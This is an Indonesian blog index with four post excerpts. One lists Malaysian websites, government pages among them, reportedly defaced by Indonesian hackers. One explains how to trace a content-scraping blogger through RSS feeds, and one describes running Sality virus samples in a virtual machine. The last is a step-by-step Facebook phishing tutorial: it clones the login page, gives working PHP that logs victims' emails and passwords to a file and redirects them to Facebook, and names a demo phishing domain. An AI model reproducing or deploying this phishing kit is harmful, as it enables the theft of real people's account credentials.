Hacker Menyikapi Insiden Bendera Terbalik

Insiden terbaliknya logo bendera NKRI yang terjadi kemarin hari, diakui merupakan tindakan yang tidak disengaja. Meski begitu, banyak pihak yang meragukan pengakuan tersebut dan menolak mentah-mentah permintaan maaf yang telah disampaikan oleh salah satu perwakilan dari Malaysia.

Tidak mengherankan, bendera sederhana Indonesia yang hanya terdiri atas dua unsur warna dan kerap dilihat tentu tidak mungkin jika dipasang secara tidak sengaja. Apalagi, jika melihat skala event yang akan berlangsung ini, harusnya tiap aspek harus diawasi dengan baik oleh tiap orang warga negara yang turut serta dalam pelaksanaan kegiatan.

Yang lalu biarlah berlalu, Pak Jokowi pun sempat meredam emosi rakyatnya dengan mengingatkan agar tidak memperpanjang permasalahan yang tengah terjadi. Apalagi setelah pihak Malaysia hendak melayangkan surat permintamaafan resminya, sangat tidak etis bila kita tetap bersikeras melakukan pembalasan. Bukannya dilihat sebagai bangsa yang bernasionalisme tinggi, malah terjungkur payah dengan image bangsa arogan dan mau menang sendiri.

Entah apa yang dipikirkan oleh hacker-hacker tanah air ini. Belum lama insiden berlalu, untaian serangan menerpa situs-situs berdomain Malaysia. Antara lain:
http://www.womenworld.my/
http://intumescent.com.my/
http://q-spray.com.my/
http://qspray.com.my/
http://vermiculite.com.my/
http://www.womenworld.my/
http://Browgenesis.com/

http://sahamsabah.com.my/z.htm
http://ezmoneyexpress.com.my/z.htm
http://wildlife-expeditions.com/ynr.htm
http://amalsabah.org/ynr.htm
http://borneonativeadventure.com/ynr.htm
http://creativemedia.my/ynr.htm
http://lifetime-adventure.com.my/ynr.htm
http://sabahpalm.com/ynr.htm
http://tenagaxx.com.my/ynr.htm

http://blog.panduanspa.com/
http://earlier.info/
http://lovabletravel.com/
http://makemoneyonlinez.info/
http://realestatesale.biz/
http://www.willpowerwithin.com/
http://jelitashop.my
http://info.jelitashop.my
http://jawatankosong1malaysia.com
http://addfanz.com
http://adsensealike.com
http://avoren.com
http://awsp.net
http://bbcreamkorea.asia
http://bestgaminglaptopz.com
http://bigsimplephones.com
http://centtravel.com
http://dentalh.com
http://duitmikro.com
http://ipelaburan.com
http://ohreviews.com
http://www.jkr.terengganu.gov.my
http://jpsweb.terengganu.gov.my
http://museum.terengganu.gov.my
http://jkrkemaman.terengganu.gov.my
http://jkrmarang.terengganu.gov.my
http://www.jkr.terengganu.gov.my
http://jkrht.terengganu.gov.my
http://jkrsetiu.terengganu.gov.my
http://jkrht.terengganu.gov.my
http://suk.terengganu.gov.my
http://upen.terengganu.gov.my
http://jkrbesut.terenggan.gov.my
http://sjcamhdmalaysia.com/
http://zbsecurity.com.my/
http://umnogombak.com/
http://saf.edu.my/
http://cmms.orie.my/
http://trymall1.myisraa.com/
http://telukbahang.balikpulau.my/
http://tunetalk.myisraa.com/
http://tryportal1.myisraa.com/
http://trytv1.myisraa.com/
http://tunetalk.myisraa.com/
http://toptours.myisraa.com/
http://trymall2.myisraa.com/
http://transfer.myisraa.com/
http://tititeras.balikpulau.my/
http://surauannurtjp.myisraa.com/
http://sms.myisraa.com/
http://imail.myisraa.com/
http://kgsungaibatu.balikpulau.my/
http://kgpulaubetong.balikpulau.my/
http://itube.myisraa.com/
http://kgseronok.balikpulau.my/
http://kgterang.balikpulau.my/
http://kggenting.balikpulau.my/
http://kgperlis.balikpulau.my/
http://syarikat.my/
http://sgburong.balikpulau.my/
http://shop.myisraa.com/
http://sgpinang.balikpulau.my/
http://sgrusa.balikpulau.my/
http://sdbl.edu.my/
http://simpangampat.balikpulau.my/
http://balikpulau.my/
http://archery.myisraa.com/
http://sjcamhdmalaysia.com/
http://account.myisraa.com/
http://activate.myisraa.com/
http://sdbl.edu.my/
http://sgara.balikpulau.my/
http://pondokupeh.balikpulau.my/
http://partner.myisraa.com/
http://pantaiacheh.balikpulau.my/
http://permatangpasir.balikpulau.my/
http://orie.my/
http://mobile.myisraa.com/
http://myisraa.net/
http://kualajalanbharu.balikpulau.my/
http://kualasgpinang.balikpulau.my/
http://kongsi.balikpulau.my/
http://help.myisraa.com/
http://fb.myisraa.com/
http://fishon.myisraa.com/
http://fax.myisraa.com/
http://directory.myisraa.com/
http://daftar.myisraa.com/
http://jpnperak.moe.gov.my/q.php
http://2017investorsguide.com
http://aziziali.com
http://aziziali.my
http://aziziali.net
http://beahappymillionaire.com
http://beliemas.com.my
http://belisuratpajak.com
http://belowmarketvalue.properties
http://bonda.com.my
http://cashflowprinciple.com
http://gosipadan.com
http://innercircle.com.my
http://innercircle.my
http://kolejjutawan.com
http://kualalumpurmalaysia.com
http://lawyerhartanah.com
http://masauntukemas.com
http://mesinwang.com
http://millionairesguidetogreatness.com
http://money101mastery.com
http://pakejumrah.com.my
http://pelaburanhartanah.com
http://pendapatanpasifseumurhidup.com
http://rahsiaemas.com
http://rahsiasuratpajak.com
http://retirerich.guru
http://rezekiberniaga.com

Wow, banyak juga ya?
Saya jadi makin bingung harus merasa bagaimana. Saya hanya berharap, mudah-mudahan masalah ini tidak sampai malah menjadi boomerang bagi negeri sendiri. Lagipula pengelola situs-situs di atas sama sekali tidak menyekal tnggung jawab atas insiden ini. Entah ini terjadi atas kesengajaan atau tidak, bangsa yang besar harus bisa menanggapinya dengan tepat, bukan hanya asal benar saja.

Read more

Cara Melacak Akun Pemilik Blog AGC/Pencuri Konten

Akhir-akhir ini marak ditemukan tindakan pelanggaran hak cipta di internet dalam bentuk pencurian artikel. Saya prihatin sekaligus bersedih, karena pelaku ini akan selalu berusaha menyembunyikan diri dan rasanya akan sulit dilacak.

Yang menyakitkan, ada pencuri yang berani menyalin konten secara habis-habisan (semua posting blog). Mereka menggunakan script AGC(Auto Generated Content) yang menyalin konten dari RSS Feed. Sebenarnya, hal ini bisa mudah dihindari dengan menyajikan feed dalam bentuk ringkasan. Namun, bagaimana bila sudah terlanjur dan pelaku bersembunyi?

Kejadian kasus AGC pernah menimpa blog Komputoo dan salah satu teman penulis, namanya Kholid Farhan. Pelaku berusaha mengelabuhi korban dengan menyembunyikan nama pengarang pada tiap posting blog. Kami sempat kebingungan. Dalam waktu bersamaan saya menemukan blog kami dicuri oleh sebuah blog AGC yang sama.

Bodohnya, kami mencari pelaku di grup facebook Blogger Indonesia secara terang-terangan. Lagian, mana ada maling yang mau ngaku, sih? Apa lagi dipaksa ngaku di depan umum! :v

Dalam keadaan bingung, saya mencoba memutar akal.
- Klik kanan blog tersangka
- Pilih view source
- Ctrl+F
- Cari Email atau kontak lain dengan pattern tertentu.

Ternyata tidak ada data berarti yang dapat saya temukan. Namun, jika beruntung bisa saja kita menemukan kontak dalam berbagai bentuk yang disembunyikan, misalnya nomor ponsel, akun media sosial atau email.

Taktik kedua, saya menggali informasi dari RSS feed. Beruntung sekali, pelaku menggunakan platform Blogger. Sebaik apapun ia menyembunyikan link RSS nya, tetap saja, alamat feed posting blogger akan selalu berwujud demikian:
http://pelaku.blogspot.com/feeds/posts/default
atau
http://pelaku.blogspot.com/feeds/posts/default?alt=rss

Dari pelacakan ini, kita bisa memperoleh nama dan akun G+ si pelaku AGC.

Selanjutnya, tinggal cari kontak yang bisa dihubungi untuk merembugkan kasus ini dengan baik-baik. Lacak juga namanya dari list anggota grup Blogger yang sering anda kunjungi untuk sharing link. Karena umumnya pelaku tahu link anda dari grup tersebut. tidak perlu marah-marah, pasti dia ngerti kok, Kalau marah, takutnya pelaku malah kabur. :D

Read more

Apa Yang Terjadi Jika Saya Menjalankan 20 Program Yang Terinfeksi Virus Sality ?

Eksperimen ini adalah eksperimen paling gila yang tidak sepatutnya dicoba. Tapi saya berani-berani aja, sih. Jangan kawatir, saya mengkompilasinya dengan VirtualBox. Meskipun sistem pada akhirnya rusak, itu sama sekali tak menjadi masalah.

Semua data virus yang saya gunakan dalam eksperimen ini saya peroleh dari www.offensivecomputing.net. Ada banyak sekali sampel virus yang berada dalam database situs ini. Di antara sekian banyak jenis dan varian virus, saya memilih Sality. Dengan segera, saya mendownload dan mengeksekusi 20 sampel file yang terindikasi telah terinfeksi berbagai macam virus Sality. Apa yang akan terjadi selanjutnya?

Simak video berikut.

Masih belum percaya? bisa dicoba sendiri di rumah. hehehe :D

Read more

Hacking : Cara Phising Facebook dengan Mudah

NB: Apapun yang anda dapatkan dari tulisan ini di luar tanggung jawab saya

Sebelum saya menceritakan eksperimen saya, perlu saya ingatkan kembali, kegiatan hacking adalah kegiatan yang sangat TIDAK BERMANFAAT, BUANG-BUANG WAKTU dan jangan lupakan tentang DOSA :D

Sebelum melakukan eksperimen ini, sebenarnya saya sudah tahu bagaimana caranya sejak lama. Tapi, berhubung 'mood' saya baru tumbuh kemarin, saya baru sempat menyampaikannya hari ini. hehehe

Yangharus agan persiapkan yang pertama adalah hosting. Karena pemakaiannya hanya sementara, pakai yang gratisan saja, misalnya 3owl.com, idhostinger.com atau terserah lah..

Okey. Let's start!

1. Buka halaman pertama Facebook.
2. Klik kanan -> View Page Source

3. Buka notepad dan copy kodenya kesini

3. Simpan dengan nama "index.php"
4. Cari kode :
 <form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1".....
lalu ganti dengan :
<form id="login_form" action="pass.php".....

5. Buat file baru dengan nama "pass.php" dengan isi kode sebagai berikut.

<?php
$email;
$pass;
$empass;
if(isset($_POST['email']))
{
    $email = $_POST['email'];
}
echo "\n";
if(isset($_POST['pass']))
{
    $pass = $_POST['pass'];
}

$empass = "$email - $pass --";

$h = fopen("pass.txt","a+");
fwrite($h,$empass,strlen($empass));
fclose($h);
header("Location: https://www.facebook.com/");
?>

6. Upload kedua file ini ke server. dan halaman phising siap digunakan :)

Demo : http://lacebook.bl.ee

 

7. Lihat hasilnya pada server

*) Hasilnya bisa dilihat pada file "pass.txt" :)
*) Jika diketahui oleh admin, keesokan harinya akan diblokir :p
*) Hanya mendukung tampilan desktop. Jika ingin mendukung mobile, buka m.facebook.com

Read more